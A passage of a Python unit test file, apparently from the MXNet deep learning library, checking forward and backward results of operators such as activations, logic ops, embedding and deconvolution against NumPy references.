check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg, np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
